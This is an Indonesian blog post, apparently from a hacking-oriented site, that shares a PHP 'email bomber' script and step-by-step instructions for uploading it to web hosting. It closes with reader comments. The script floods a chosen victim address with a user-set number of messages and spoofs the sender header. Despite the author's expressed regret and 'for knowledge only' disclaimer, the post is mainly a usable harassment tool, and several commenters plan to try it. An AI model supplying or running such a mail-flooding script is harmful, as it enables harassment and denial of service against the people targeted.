Home / Coding / Script BOM E-Mail Menggunakan PHP
bom-email

Script BOM E-Mail Menggunakan PHP

Ini kerjaan usil waktu masih duduk dibangku Kuliah dulu. Mulai dari belajar ngehack, ngedeface, mencuri kuota temen sampai mengirim pesan ke email temen yang jumlahnya ribuan bahkan jutaan. Alamat email email bomber email bomb program email bomb online flood email email bomb software make email bomb Penelusuran yang terkait dengan bom email cara membuat bom email cara boom emailΒ  bom email software bom email bom 2011 bom friends sign up bom, bom email teman.

bom email - flood email

Saya akan ngebahas kejahatan saya bagian mengirim mail yang jumlahnya ribuan, tapi sekarang saya udah sadar kalo hal itu salah, tidak ada gunanya serta tidak ada untungnya dan tak layak untuk ditiru.

Jadi mohon di maafkan ya teman – teman kalo saya pernah ngusilin kalian. Hehe.. πŸ™‚

Berikut contoh potongan programnya:

<html>
<body>
<form method=post action=index.php>
<pre>
<input type=hidden value=ok name=ok>
Dari : <input name=dari value=”<? echo $dari;?>”>
Kepada : <input name=kepada value=”<? echo $kepada;?>”>
Jumlah : <input name=jumlah value=”<? echo $jumlah;?>”>
Isi Pesan: <textarea name=isi><?echo $isi?></textarea><br>
<input type=submit value=Booom>
</form></pre>
<?
if ($ok==”ok”)
{
for ($i=0;$i<$jumlah;$i++)
{
$a=$i.$dari;
mail($kepada,$isi,””,”From : $a <$a>”);
}
echo (“Beres Bos”);
}
?>
</body>
</html>

Lalu simpan code tersebut dalam sebuah file, misalkan email-bomber.php

Selanjutnya masukkan file tersebut dalam webserver atau webhosting kamu.

Langkah berikutnya buka browser lalu masukkan alamat dimana kamu menyimpan file tersebut misalkan http://namadomainkamu.com/email-bomber.php

Jika alamat e-mail yang ditujukan benar maka akan secara otomatis mengirimkan pesan ke email korban.

Pesan terakhir jangan dilakukan karena Tuhan maha tahu dan kalo ada salah kata mohon di maafkan.

NB:
Artikel ini hanya untuk ilmu pengetahuan semata, penyalah gunaan artikel ini diluar dari tanggung jawab penulis.

About sir-bucex

Check Also

url-shortener-memperpendek-url-binushacker

Source Code URL Shortener 2 Versi – MiniUrlz

Halo kawan, ini postingan pertama saya di Binus Hacker, Disini saya akan share clone script …

23 comments

  1. matap gan, ane coba dulu ah πŸ˜€ thanks infonya…..

  2. Nurudin Forza

    Kalo gak dicoba gan mana bisa tau bisa apa kagak…….
    Hehehehe, tuk pengetahuan coba2 dikitlah gpp…..
    ^_^

  3. Sadis nih Script XD
    Nicce info Bos

  4. thanks gan sharenya

    ijin nyoba ~~~~>>>

  5. maSih kuraNg paham om caraNya?biSa Lebih jeLaS gak untuk bagian peNaruhan di websitnya???????

  6. Script php-nya kok malah muncul di dalam TEXT AREA semua.

  7. Mantap…..tapi master….saya mau tanya nih?gaptex saya…cara hapus percakapan diyahoo mail
    gimana ya,penuh di databse yahoo…

  8. sekarang tiap hosting di batasi kirim email nya ,, kalau ngenyel di suspend dah,, πŸ˜€

  9. bank belum ngerti,maklum solnya masih newbe…

  10. alamat e-mail yang dituju diisi dibagian yang mana gan?? dibagian scriptnya itu gan..

  11. Klo yg udh k boom msh bsa d buka ge ngk email na gan,,,,,

    mohon pencerahan na gan,,,,,,

  12. kalau boleh minta penjelasan nya dengan lengkap ya kk,, agar infonya dapat di pahami dengan sempurna,, dan gak sia sia sudah di post
    yg saya mau tanyain :

    if ($ok==”ok”)
    {
    for ($i=0;$i<$jumlah;$i++)
    {
    $a=$i.$dari;
    mail($kepada,$isi,”",”From : $a ”);
    }

    cara kerja nya gimana sih kk…? dia akan mengirim terus selama “i = jumlah”
    ya…?
    trus apa kah ini berlaku untuk semua email..? kalau jenis email nya @gmail.com, hotmail.com , dll…? dan terakhir, menggunakan jaringan apa kah email yang kita kirim..? apa kah jaringan inet kita sendiri atau inet yang di sedia kan perusahaan email tsbut..?
    thanks before,,,

  13. mantap gan !,tpi software e-mail bomber ada gk ?
    habis scropt nya ribet….gk ngerti gw !

  14. Bos scripnye deh pas belon…..? kayanye ada yang kurangtuh…

    hehehe…….!!!!!

  15. jng kebanyakan kirim emailnya, web/hosting yg lu pake buat taro script itu bakal kena deindex. pengalaman

  16. ente yang newbie aja gak ngerti apalagi ane yang lamer gan.. -________-“

  17. itu ada yg hrus diganti apa langsung dikemas dalam php ?

  18. binus hacker otakk smua orang

  19. Kagak bisa bang…

  20. gan itu syntac nya eerroooor,.,.,. πŸ™

  21. hehe test dlu sob πŸ™‚

Tinggalkan Balasan ke Ryika Batalkan balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *